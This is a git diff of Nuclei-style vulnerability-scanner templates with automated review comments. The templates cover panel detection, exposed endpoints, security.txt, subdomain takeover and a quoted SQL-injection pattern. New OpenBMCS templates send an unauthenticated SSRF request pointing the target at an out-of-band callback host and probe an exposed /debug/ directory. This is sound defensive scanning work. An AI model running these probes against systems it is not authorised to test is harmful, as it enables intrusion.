author: dhiyaneshDK
author: dhiyaneshDK,righettod
severity: info
reference: https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus%22
reference:
- https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus%22
- https://www.shodan.io/search?query=http.title%3A%22ManageEngine+ServiceDesk+Plus+-+MSP%22
tags: panel,zoho,manageengine
requests:
@ -17,6 +19,7 @@ requests:
- type: word
words:
- '<title>ManageEngine ServiceDesk Plus</title>'
- '<title>ManageEngine ServiceDesk Plus - MSP</title>'
- type: status
status:

View File

@ -1,7 +1,7 @@
id: honeywell-scada-config
info:
name: Honeywell Scada System Information Disclosure
name: Honeywell Scada System Information Disclosure
author: alperenkesk
severity: low
reference: https://www.exploit-db.com/exploits/44734
@ -22,4 +22,4 @@ requests:
- type: status
status:
- 200
- 200

File diff suppressed because it is too large

File diff suppressed because it is too large

View File

@ -27,7 +27,7 @@ file:
- type: regex
# Investigate for possible SQL Injection
# Likely vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = $user_id");
# Likely not Vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = ?", array($user_id));
# Likely not Vulnerable: $dbConn->GetRow("SELECT * FROM users WHERE id = ?", array('$user_id'));
regex:
- '(?i)getone|getrow|getall|getcol|getassoc|execute|replace'
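Review bot: the changed comment `array('$user_id')` is a regression: in PHP, `'$user_id'` in single quotes is the literal string `$user_id`, not the variable, so the "likely not vulnerable" example no longer binds the user id at all; restore `array($user_id)`.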
- type: regex

View File

@ -4,7 +4,7 @@ info:
name: AddEventlistener detection
author: yavolo
severity: info
tags: xss
tags: xss,misc
reference: https://portswigger.net/web-security/dom-based/controlling-the-web-message-source
requests:
@ -14,6 +14,6 @@ requests:
matchers:
- type: word
part: body
words:
- 'window.addEventListener('
part: body

View File

@ -4,7 +4,7 @@ info:
name: Apple app site association for harvesting end points
author: panch0r3d
severity: info
tags: misc
tags: misc,apple
requests:
- method: GET
@ -17,17 +17,17 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'applinks'
- 'appID'
- 'paths'
part: body
condition: and
- type: word
part: header
words:
- 'application/json'
part: header
- type: status
status:

View File

@ -11,6 +11,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: word
words:
@ -18,3 +19,4 @@ requests:
- "Index of /"
- "[To Parent Directory]"
- "Directory: /"
condition: or

View File

@ -1,20 +0,0 @@
id: display-via-header
info:
name: Display Via Header
author: geeknik
reference: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Via
severity: info
tags: misc,generic
requests:
- method: GET
path:
- "{{BaseURL}}"
redirects: true
extractors:
- type: regex
part: header
regex:
- "Via:.*"

View File

@ -16,14 +16,14 @@ requests:
matchers:
- type: word
words:
- "# @package Joomla"
- "Joomla"
- "Open Source Matters. All rights reserved"
condition: and
- type: word
part: header
words:
- "text/plain"
part: header
- type: status
status:

View File

@ -21,9 +21,9 @@ requests:
condition: and
- type: word
part: header
words:
- "application/xml"
part: header
- type: status
status:

View File

@ -22,9 +22,9 @@ requests:
condition: and
- type: word
part: header
words:
- "text/plain"
part: header
- type: status
status:

View File

@ -14,7 +14,7 @@ requests:
Host: {{Hostname}}
Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
threads: 50
threads: 10
payloads:
path:
- /

View File

@ -16,9 +16,9 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- '2022'
part: body
negative: true
- type: regex
@ -28,10 +28,10 @@ requests:
- '© [1-9]\d*'
- '&copy; [1-9]\d*'
- '&#169; [1-9]\d*'
extractors:
- type: regex
part: body
name: copyright_year
regex:
- 'Copyright [1-9]\d*'
- '© [1-9]\d*'

View File

@ -1,7 +1,7 @@
id: detect-options-method
id: options-method
info:
name: Detect enabled OPTIONS methods
name: Allowed Options Method
author: pdteam
severity: info
tags: misc,generic

View File

@ -9,6 +9,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/robots.txt"
matchers-condition: and
redirects: true
matchers:
@ -17,9 +18,9 @@ requests:
- "Disallow:"
- type: word
part: header
words:
- text/plain
part: header
- type: dsl
dsl:

View File

@ -10,20 +10,28 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/.well-known/security.txt"
- "{{BaseURL}}/security.txt"
- "{{RootURL}}/.well-known/security.txt"
- "{{RootURL}}/security.txt"
stop-at-first-match: true
redirects: true
max-redirects: 3
max-redirects: 2
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Contact:"
condition: and
- type: dsl
dsl:
- "len(body) <= 1024 && len(body) > 0"
condition: and
extractors:
- type: regex
group: 1
regex:
- '(?mi)Contact:(.*)'
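Review bot: the new DSL matcher `len(body) <= 1024 && len(body) > 0` rejects legitimate security.txt files: RFC 9116 files that carry several `Contact:`/`Policy:`/`Encryption:` lines, an `Expires:` line and a PGP cleartext signature routinely exceed 1 KiB, so the template now misses exactly the well-maintained ones. If the intent is to exclude HTML fallback pages, match on `Contact:` (already present) and a `text/plain` content type instead of a size cap. The `condition: and` lines on the single-entry word and dsl matchers are no-ops.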

View File

@ -1,25 +0,0 @@
id: tabnabbing-check
info:
name: Reverse Tabnabbing
author: bolli95
severity: info
tags: misc
reference:
- https://owasp.org/www-community/attacks/Reverse_Tabnabbing
- https://www.youtube.com/watch?v=TMKZCHYmtD4
- https://hackerone.com/reports/211065
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'regex("<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", replace_regex(replace_regex(body, "<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*(rel=\"noopener noreferrer\"|rel=\"noreferrer noopener\"|rel=\"noreferrer\"|rel=\"noopener\")[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", ""), "<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*(rel=\"noopener noreferrer\"|rel=\"noreferrer noopener\"|rel=\"noreferrer\"|rel=\"noopener\")[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", "")) || regex("window\.open\\([^,]+\\)", body)'
- type: dsl
dsl:
- "!contains(tolower(all_headers), 'referrer-policy: no-referrer')"

View File

@ -15,9 +15,9 @@ requests:
matchers:
- type: word
name: trace-request
part: body
words:
- "TRACE / HTTP"
part: body
- method: OPTIONS
path:
@ -26,6 +26,6 @@ requests:
matchers:
- type: regex
name: options-request
part: header
regex:
- "(?i)Allow: [A-Z,]*TRACE"
part: header

View File

@ -4,7 +4,7 @@ info:
name: JavaMelody Monitoring Exposed
author: dhiyaneshDK,thomas_from_offensity
severity: medium
description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to “View http sessions”. This can be used by an attacker to steal a users session.
description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to "View http sessions". This can be used by an attacker to steal a user's session.
reference:
- https://www.acunetix.com/vulnerabilities/web/javamelody-publicly-accessible/
- https://github.com/javamelody/javamelody/wiki/UserGuide#16-security

View File

@ -0,0 +1,28 @@
id: openbmcs-secret-disclosure
info:
name: OpenBMCS 2.4 Secrets Disclosure
author: dhiyaneshDK
severity: high
description: The application allows directory listing and information disclosure of some sensitive files that can allow an attacker to leverage the disclosed information and gain full BMS access
reference: https://www.exploit-db.com/exploits/50671
tags: openbmcs,misconfig
metadata:
shodan-query: http.favicon.hash:1550906681
requests:
- method: GET
path:
- "{{BaseURL}}/debug/"
matchers-condition: and
matchers:
- type: word
words:
- "change_password_sqls"
- "Index of /debug"
condition: and
- type: status
status:
- 200

View File

@ -0,0 +1,31 @@
id: openbmcs-ssrf
info:
name: OpenBMCS 2.4 Unauthenticated SSRF / RFI
author: dhiyaneshDK
severity: high
description: Unauthenticated Server-Side Request Forgery (SSRF) and Remote File Include (RFI) vulnerability exists in OpenBMCS within its functionalities. The application parses user supplied data in the POST parameter 'ip' to query a server IP on port 81 by default. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application, allows hijacking the current session of the user, execute cross-site scripting code or changing the look of the page and content modification on current display
reference: https://www.exploit-db.com/exploits/50670
tags: ssrf,oast,openbmcs
metadata:
shodan-query: http.favicon.hash:1550906681
requests:
- raw:
- |
POST /php/query.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
ip={{interactsh-url}}:80&argu=/
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "http"
- type: status
status:
- 302
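Review bot: the comment `# Confirms the DNS Interaction` on the `interactsh_protocol` matcher contradicts the matcher itself, which looks for `http`; the template asserts an HTTP callback (consistent with `ip={{interactsh-url}}:80`), so fix the comment, or match `dns` if a resolution alone is meant to count (weaker evidence of SSRF). The `description` is also a single run-on sentence that ends without a period.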

View File

@ -4,7 +4,7 @@ info:
name: Prometheus targets API endpoint
author: geeknik
severity: info
description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developers knowledge.
description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developer's knowledge.
reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
tags: prometheus

View File

@ -4,7 +4,7 @@ info:
name: Detect Springboot Thread Dump page
author: philippedelteil
severity: low
description: The threaddump endpoint provides a thread dump from the applications JVM.
description: The threaddump endpoint provides a thread dump from the application's JVM.
reference: https://docs.spring.io/spring-boot/docs/2.4.11-SNAPSHOT/actuator-api/htmlsingle/#threaddump
tags: springboot

View File

@ -15,6 +15,6 @@ requests:
matchers:
- type: word
words:
- '<h1 class="headline">Uh oh. That page doesn\t exist.</h1>'
- 'This page is reserved for artistic dogs.'
- '<h1 class="headline">Uh oh. That page doesnt exist.</h1>'
condition: and
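Review bot: the word was changed from `doesn\t` to `doesnt`, but neither spelling matches the headline if the live 404 page renders it as `doesn't` (straight or curly apostrophe); please confirm the exact text in the response and, if it contains an apostrophe, use a regex matcher such as `doesn.t exist` instead of a literal word.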

View File

@ -2,7 +2,7 @@ id: shopify-takeover
info:
name: shopify takeover detection
author: pdteam
author: pdteam,philippedelteil
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
@ -26,4 +26,6 @@ requests:
- type: dsl
dsl:
- '!contains(host,"myshopify.com")'
- '!contains(host,"myshopify.com")'
- '!contains(host,"shopify.com")'
condition: and
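Review bot: the added check `!contains(host,"shopify.com")` already excludes every host containing `myshopify.com`, so the retained `!contains(host,"myshopify.com")` line is redundant; keep one or the other rather than the duplicated-looking pair.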

Some files were not shown because too many files have changed in this diff